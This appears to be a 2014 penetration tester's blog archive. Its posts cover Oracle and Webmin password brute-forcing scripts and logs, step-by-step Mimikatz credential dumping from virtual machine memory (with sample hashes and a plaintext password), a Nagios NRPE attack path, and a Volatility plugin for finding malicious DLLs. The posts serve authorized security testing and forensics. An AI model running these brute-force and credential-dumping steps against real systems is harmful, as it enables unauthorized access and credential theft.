Monday, December 29, 2014


Ken Johnson and I gave a talk on going after Devops tools at Lascon in October.  Slides for the talk are below:

LasCon 2014 DevOoops from Chris Gates

The talk was recorded, once the talk is posted somewhere I'll update my vimeo channel with the talk.


Friday, October 31, 2014

Quick and Dirty Oracle Brute Forcing

Here is a quick bash script to wrap sqlplus for some brute forcing if for whatever reason nmap is failing to get the job done...and thus metasploit is failing to get the job done since the oracle_login module just calls nmap

[ ! -f $INPUT ] && { echo "$INPUT file not found"; exit 99; }
while read comment number username password hash comment
echo "string = $username:$password"
/opt/oracle/instantclient_10_2/sqlplus -L $username\/$password\@\/ORCL
done < $INPUT

What this will do is use the default oracle username/password list that ships with metasploit, parse that csv, and shove the username and password into the sqlplus command.  If you guess one right the script will hang with you logged in with the guessed account.



Friday, October 17, 2014

Its nice to see smart people in the industry like Dave Aitel (, catching up to things we have been quietly providing to our clients for years. Attack Simulation and Threat Response / Reduction have been big focuses for Attack Research for a while now.

First I will address Attack Simulation. Many of the high end (fortune 100 and above) customers already know what machines they need to patch, or that they have weak passwords or vulnerable applications. There is still a place for the vuln scan companies and the PCI auditors, but for those companies who have dealt with those issues and are trying to deal with the most serious threats, rather than the noise, there is a whole different set of questions they need to answer:

1.) How will their detection and response teams perform under pressure?
2.) What are the attack paths that will likely be taken to compromise "crown jewels", be that customer data, IP, source code, etc.?
3.) How does exfiltration of high value data look in their environment?
4.) What does it look like  in their infrastructure when an attacker sits quietly sniffing and collecting host surveys, using sysadmin credentials, adding vulnerabilities to internal source, over long periods of time rather than a week long scan and bang?

There is lots more but you get the idea. Our APTSim program has been answering those questions for several years. (First published September 19th, 2012, but had been operating for a while before it was publicly announced). In this program we have done things like:

- Exfiltraton tests using custom written steg, network protocol based covert channels, data to superaudible tones to cell phone mic.
- Built mis-attributable command and control infrastructures overseas to mimic APT type campaigns.
- Engaged in DLP evasion exercises.
- Built custom hardware to implant in intercepted employee's equipment.
- Modified high value client source code to introduce subtle access mechanisms.

We first publicly demonstrated command and control tools communicating over Tor in 2009 (

Next we have Threat Response, or as we like to call it, Threat Reduction. Many of our clients have come to us stating a problem. They have purchased many Threat Intel feeds, they get thousands and thousands of signatures or IOCs a day, bulletins rehashing twitter conversations, or someone charging them $20,000 a month to scrape Pastebin for their company brand. But what should they do with all this information? Often they dont have the infrastructure, personnel, skillsets, or internal political clout to take action on all of this "intelligence". And how many of these 100000s of items really pose a direct, targeted, threat which warrants real concern beyond the question: "Ok, how fast can we re-image 1000 workstations". Not as many as you might think.

These companies don't need threat intel, as it is being currently sold, they need Threat Reduction, which is exactly what we have been providing for years. Our clients get notices from us saying "There was a threat targeting you specifically, here is the brief description, it's been handled per our agreed upon ROE", rather than "here are 10,000 IOCs, good luck, hope you can stop them yourself!" which amounts to basically a huge, never ending, trouble ticket.  This type of service that we provde involves a deep understanding of the client's business and priorities, trust, and the ability to actually DO something about specific threats. This might mean that we make customized modifications to the client's detection / blocking tools, a week before we know a specific type of attack is going to hit them, surveilling a specifc group of actors known to pose a problem (In person, online, etc.), taking down a bot net, or arranging for the delivery of cease and desist notices. It involves developing information sources around the world that go beyond a simple web crawler. Our clients are in the business of producing energy, managing people's money, or manufacturing devices you use every day. They are not in the business of sorting through an internet worth of MD5 sums! That is not their expertise, nor should it have to be. (Some places do have crack internal teams, and they have my respect, but it is not realistic to think that everyone can have 20 FTEs on staff with all the requisite skillsets from RE to exploit reconstruction.)

Like AV, threat intel is one of those things that's probably somewhat helpful to have on hand, but doesn't do much to help organizations deal with specific, focused concerns about their highest priority interests. They need Threat Reduction, they need true, real world, exercising of their detection and response teams, and I am glad to see others I respect finally catching up to the idea.


Friday, June 13, 2014

Mimikatz Against Virtual Machine Memory Part 2

Short update to talk about mostly performing the actions from Part 1 on Windows 8+ and Windows Server 2012

First issue was symbols in windbg. Most importantly, NO symbols for windbg. I found this article that lets you remotely download them:

.sympath SRV*f:\localsymbols*

0: kd> .sympath SRV*f:\localsymbols*
Symbol search path is: SRV*f:\localsymbols*
Expanded Symbol search path is: srv*f:\localsymbols*
0: kd> .reload
Loading Kernel Symbols
Loading User Symbols

Loading unloaded module list

Second issue was creating the dmp file. I tried volatility's imagecopy and The Windows Memory Toolkit. Neither produced a dump file that would work with windbg for Windows 8 or Windows 2012. What did work was VMWare's vmss2core utility.

Note for VMware workstation/fusion you need to pass it the .vmsn and .vmem files (shown above)

For VMware ESXi i just needed to pass the .vmsn file

The rest follows the same flow as the previous post

1.  Load the memory.dmp file vmss2core created

2. Fix your symbols (shown above)

3. Load the mimilib.dll file

kd> .load C:\users\user\desktop\mimilib.dll

4. Find the lsass process

kd> !process 0 0 lsass.exe
PROCESS ffffe00112f08080
    SessionId: 0  Cid: 01e8    Peb: 7ff623aac000  ParentCid: 0194
    DirBase: 06291000  ObjectTable: ffffc001f8f0c400  HandleCount:
    Image: lsass.exe

5. Switch to that process

kd> .process /r /p ffffe00112f08080
Implicit process is now ffffe001`12f08080
Loading User Symbols

6. Run Mimikatz

kd> !mimikatz

7. Drink Beers

Friday, May 30, 2014

Mimikatz Against Virtual Machine Memory Part 1

Pentesting is a funny thing. Someone will drop some new way of doing something and then you get to reflect on all those missed opportunities on previous engagements. I remember when MC showed me all the Oracle stuff and I reminisced about the missed shells.

This post and part 2 is like that for me. I can't count the number of times i've had access to the folder full of an organization's virtual machines. I knew you could download the raw disk (vmdk) and use tools like volatility on them to carve out useful pieces of the file system but not memory.

While doing some research on vCenter/ESXi I  came across a couple of blog posts on the subject:

This of course sent me down the rabbit hole to see if I could do it.

Remko's post mentions you need a few things:

The Windows debugging tools:

The Windows Memory Toolkit

Current mimikatz that supports the windbg magic

Gotcha #1: The free version of Windows Memory Toolkit limits OS and architecture you can do this on.  Restrictions are 32bit  up to Windows Server 2008.

The process:

#1 Copy the vmem/vmsn from the remote host

#2 Use moonsols bin2dmp to convert it into a dmp file. (I'm using the for pay version below)

C:\Users\user\Desktop>Bin2Dmp.exe "Windows Server 2008 x64-b2afd86a.vmem" win2k8.dmp

  bin2dmp - v2.1.0.20140115
  Convert raw memory dump images into Microsoft crash dump files.
  Copyright (C) 2007 - 2014, Matthieu Suiche
  Copyright (C) 2012 - 2014, MoonSols Limited

Initializing memory descriptors... Done.
Directory Table Base is 0x124000
Looking for Kernel Base...
Looking for kernel variables... Done.
Loading file... Done.
nt!KiProcessorBlock.Prcb.Context = 0xFFFFF80001B797A0

stuff happens
   [0x0000000040000000 of 0x0000000040000000]    [0x000000001DAFE000 of 0x000000
   MD5 = E8C2F318FA528285281C21B3141E7C51

Total time for the conversion: 0 minutes 14 seconds.

you should now have a .dmp file you can load into windbg

#3 Load the dmp file into windbg

Gotcha #2: You may have to run .symfix and .reload

kd> .symfix
kd> .reload
Loading Kernel Symbols
Loading User Symbols

Loading unloaded module list

#4 Load the mimilib.dll file

kd> .load C:\users\user\desktop\mimilib.dll

  .#####.   mimikatz 2.0 alpha (x64) release "Kiwi en C" (May 25 2014 21:48:13)
 .## ^ ##.  Windows build 6002
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( )
 '## v ##'             (oe.eo)
  '#####'                                  WinDBG extension ! * * */

#         * Kernel mode *         #
# Search for LSASS process
0: kd> !process 0 0 lsass.exe
# Then switch to its context
0: kd> .process /r /p
# And finally :
0: kd> !mimikatz
#          * User mode *          #
0:000> !mimikatz

The tool output will walk you through the rest

#5 Find the lsass process
kd> !process 0 0 lsass.exe
PROCESS fffffa800dba26d0
    SessionId: 0  Cid: 023c    Peb: 7fffffd4000  ParentCid: 01e4
    DirBase: 2e89f000  ObjectTable: fffff880056562c0  HandleCount: 1092.
    Image: lsass.exe

#6 switch to the lsass context fffffa800dba26d0 in this case

kd> .process /r /p fffffa800dba26d0
Implicit process is now fffffa80`0dba26d0
Loading User Symbols

#7 Load mimikatz
kd> !mimikatz

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WIN-3C4WXGGN8QE$
Domain            : UNLUCKYCOMPANY
SID               : S-1-5-20
msv :
[00000002] Primary
* Username : WIN-3C4WXGGN8QE$
* NTLM     : ea2ed0b14406a168791adf5aee78fd0b
* SHA1     : ab7bd2f6a64cf857c9d69dd65916622e3dc25424
tspkg : KO

Authentication Id : 0 ; 173319 (00000000:0002a507)
Session           : Interactive from 1
User Name         : Administrator
Domain            : UNLUCKYCOMPANY
SID               : S-1-5-21-2086621178-2413078777-1398328459-500
msv :
[00000002] Primary
* Username : Administrator
* LM       : e52cac67419a9a2238f10713b629b565
* NTLM     : 64f12cddaa88057e06a81b54e73b949b
* SHA1     : cba4e545b7ec918129725154b29f055e4cd5aea8
tspkg :
* Username : Administrator
* Password : Password1
wdigest :
* Username : Administrator
* Password : Password1
kerberos :
* Username : Administrator
* Password : Password1

* Key List

There were a few other gotchas for Windows 8 and Windows 2012. I'll put that in part 2.



Friday, May 23, 2014

Nagios and NPRE

Just a note for me for later as other blogs have been tending to disappear lately and so I don't get unduly excited when I see a nagios NRPE exploit/bug as there are a few obstacles to overcome.

Very detailed writeup for my summarized notes below:

Nagios NRPE has now had at least two separate issues.

for less than 2.14 there is a metasploit module:

for 2.15 and below there is a newer exploit that came out in April 2014 here:

as of 23 May 2014 this is unpatched.

stuff to remember on nagios:

Obstacle #1. You have to configure the host running the NRPE daemon to talk to a nagios server, your requests to try to exploit the client running NPRE must come from one of the hosted specfiically listed in the nrpe.config. The default is local host only. If you aren't on the list, the application will forcefully disconnect your connection. You can test this by telnetting to the host on 5666.

Obstacle #2. The NRPE daemon must be configured with the dont_blame_nrpe to 1. This is not the default setting. However, if people are using the daemon I've seen this set, otherwise I don't think anyone would be able to interact with it remotely, thus to use NRPE you have to enable it. Please correct me if i'm wrong.

Obstacle #3. You have to enable commands. However, it looks like pretty much any commands that take arguments is vulnerable.

Attack Path:
If you can gain access to any server that is allowed to access the hosts running NRPE (typically the nagios monitoring servers) and you can run the various nrpe plugins you can potentially gain access to the monitored hosts.

As always if i'm way off  or there are other tricks please let me know via twitter or here in the comments and i'll update the post.



Tuesday, March 25, 2014

DNS Brute String

just sticking this here so i can find it later. thanks @mubix

cat hosts.txt | xargs -t -I subdomain dig +noall +answer

update, rob pointed me to his post on it

Wednesday, March 12, 2014

Webmin Brute Forcing

So i ran across a bunch of webmin boxes on a pentest. I went to just go try http_login or some other spiffy Metasploit auxiliary module but nothing was working quite right. I ended up needing to write my own because i had about 60+ hosts to check and that just tedious enough to make you write code and not manually do it.

At least one gotcha i discovered is that webmin will block the IP after four or five (usually 5) attempts.  I believe the default is 300 seconds it will also supposedly increase the delay if the same host keeps hitting it.

I took the approach to throw 5 passwords at it, if its not something super obvious then i'd move along. maybe not the best solution but i wanted to make sure it wasn't root/root or webmin/webmin and move on.

msf auxiliary(webmin_login_brute) > set RHOSTS
smsf auxiliary(webmin_login_brute) > set RPORT 10000
RPORT => 10000
smsf auxiliary(webmin_login_brute) > set SSL TRUE
msf auxiliary(webmin_login_brute) > set BLANK_PASSWORDS false

setmsf auxiliary(webmin_login_brute) > set USER_AS_PASS false
USER_AS_PASS => false
set msf auxiliary(webmin_login_brute) > set USERNAME root
USERNAME => root
msf auxiliary(webmin_login_brute) > set PASS_FILE /root/.msf4/data/wordlists/webmin_defaults.txt

PASS_FILE => /root/.msf4/data/wordlists/webmin_defaults.txt
msf auxiliary(webmin_login_brute) > run

[*] Verifying login exists at
[*] - Webmin - Attempting authentication
[*] WEBMIN - [1/6] - /session_login.cgi - Webmin - Trying username:'root' with password:''
[-] WEBMIN - [1/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:''
[*] WEBMIN - [2/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'root' 
[-] WEBMIN - [2/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'root'
[*] WEBMIN - [3/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'webmin'
[-] WEBMIN - [3/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'webmin'
[*] WEBMIN - [4/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'password'

[-] WEBMIN - [4/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'password'
[*] WEBMIN - [5/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'letmein'
[-] WEBMIN - [5/6] - /session_login.cgi 403 - Webmin - We got blocked
[*] WEBMIN - [6/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'password1'
[-] WEBMIN - [6/6] - /session_login.cgi 403 - Webmin - We got blocked
[*] Scanned 1 of 1 hosts (100% complete)

and looks like this when it works

[*] Verifying login exists at
[*] - Webmin - Attempting authentication
[*] WEBMIN - [1/6] - /session_login.cgi - Webmin - Trying username:'root' with password:''
[-] WEBMIN - [1/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:''
[*] WEBMIN - [2/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'root'
[-] WEBMIN - [2/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'root'
[*] WEBMIN - [3/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'webmin'
[-] WEBMIN - [3/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'webmin'
[*] WEBMIN - [4/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'password'
[+] - Webmin - Login Successful 302 with 'root':'password' Redirect to->
[*] WEBMIN - [5/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'letmein'
[-] WEBMIN - [5/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'letmein'
[*] WEBMIN - [6/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'password1'
[-] WEBMIN - [6/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'password1'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

** note you have to unset the PASSWORD value too, for some reason its populating with a blank password and trying that which sucks if you only have five chances.

Code is here:

figured i'd let the blog serve as way to let people test prior to doing a pull request.



Thursday, February 20, 2014

Finding malicious DLLs with Volatility

Colin and I were working on an memory image the other day and needed to find DLLs loaded by svchost.exe. We turned to everyone's default memory analysis tool Volatility. Volatility doesn't really give you a good option to search for loaded dlls by process name. You can specify a pid to do this, but when you have many processes that have the same name (ie svchost.exe) you can end up with a nasty command like this to do the trick.

This really wasn't working for us so we took a look at Volatility's source code and made some small adjustments.  We modified the module that ultimately affects the dlllist module. Normally if you select dlllist plugin with the -h option it gives you various options you can use such as an offset or a pid as seen below:

With our modified you have a new option for adding a process by name or a list of processes by name as seen below:

Now we can simply give it the svchost.exe process by name and get a list of loaded DLL's by processes running by that name. If you have a non-standard svchost.exe process running then this will pick it up as well, but that situation might also help identify a compromise :)

So executing volatility with the following command -f 7re-912d4ad7.vmem --profile Win7SP1x64 dlllist -n svchost.exe now gives an output of:

I am sure there are better ways at getting the same information, but this worked rather well for us and we thought we would share. You can get the module at our github repository.

To install it just replace the from your $VOLATILITYHOME/volatility/plugins directory with our

We have tested it on volatility 2.2, 2.3, 2.3.1 on XP and Windows 7 with no problems.


Thursday, January 2, 2014

Modern Day Gold Mining

Well maybe not Gold...but Litecoins, hobonickels, dodgecoins, and other kinds of *coins*

We've all heard about Bitcoins (BTC) and all wish we had bought a few hundred 2 years ago so we could retire today but who knew...

We'll its too late to get in the bitcoin game due to the difficultiy of mining one being super high but thankfully 60+ alternate crypto currencies have sprung up and thanks to sites like  you can now trade those alternate currencies for BTC.

want to know what to mine? you can check out or

Punch in the numbers for your SHA256/scrypt cracking ability and get an idea what to mine to make the most $$$ the fastest. so if you can do 300 KH/s (average cheap GPU)

in 166 days you can make one Bitcoin (BTC) mining Netcoins and exchanging them at current rate where it would take more like 2000 days to make a Bitcoin.

OMG its raining money! sort of.

anyway its neat.  seems like a good reason to set up a build a hash cracker, write it off for security stuff, and have it mining when its not busy converting hashes into plaintext.

Couple articles on it:

Solo Mining vs Pools

Hardware comparison to get an idea what numbers to put into those crunchers.

You can even buy a 6 graphic card motherboard for mining, stock trading or making everyone (well your geek homies) jealous

happy cracking/mining

From a hacker shit perspective... i cant image the mining pool software is very good. its probably worth taking a look at it. :-)